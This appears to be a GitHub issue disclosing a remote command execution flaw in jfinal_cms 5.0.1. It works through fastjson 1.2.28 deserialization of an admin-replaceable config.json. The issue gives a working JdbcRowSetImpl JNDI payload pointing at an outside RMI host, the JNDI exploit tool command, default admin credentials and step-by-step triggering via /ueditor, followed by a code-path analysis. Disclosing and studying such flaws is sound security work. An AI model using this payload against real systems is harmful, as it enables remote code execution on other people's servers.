Skip to content

Administrator Interface Command Execution Vulnerability #28

Open
@sp4zcmd

Description

Vulnerability summary

A command execution vulnerability exists in jfinal_cms 5.0.1

JDK version requirements:

  • JDK version used based on RMI<=6u141, 7u131, 8u121
  • JDK version used based on LDAP<=6u211, 7u201, 8u191.

jfinal_cms version:5.0.1

fastjson version:1.2.28
image

vulnerability recurrence

JDK version used in the test: JDK8u101

Run the tool on kali, start rmi and ldap services

https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

image

replace rmi or ldap address in payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit":true
    }
}

Create the config.json file and copy the payload in

image

Log in to the Backstage management system, select template management

default password:admin/admin123

image

Click config.json
image

Click Replace file

image

Replace with the config.json file containing the payload just created
image

Visit /ueditor, execute the command to pop up the calculator

http://localhost:8080/jfinal_cms/ueditor

2-163386968657022

Vulnerability analysis

com.jflyfox.component.controller.Ueditor

The ActionEnter class is instantiated in the index method of the /ueditor route
image

com.baidu.ueditor.ActionEnter#ActionEnter

The ConfigManager class is instantiated in the constructor of the ActionEnter class
image

com.baidu.ueditor.ConfigManager#ConfigManager

The construction method of ConfigManager calls initEnv()
image

com.baidu.ueditor.ConfigManager#initEnv

Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.
image

com.baidu.ueditor.ConfigManager

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization
image
image

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions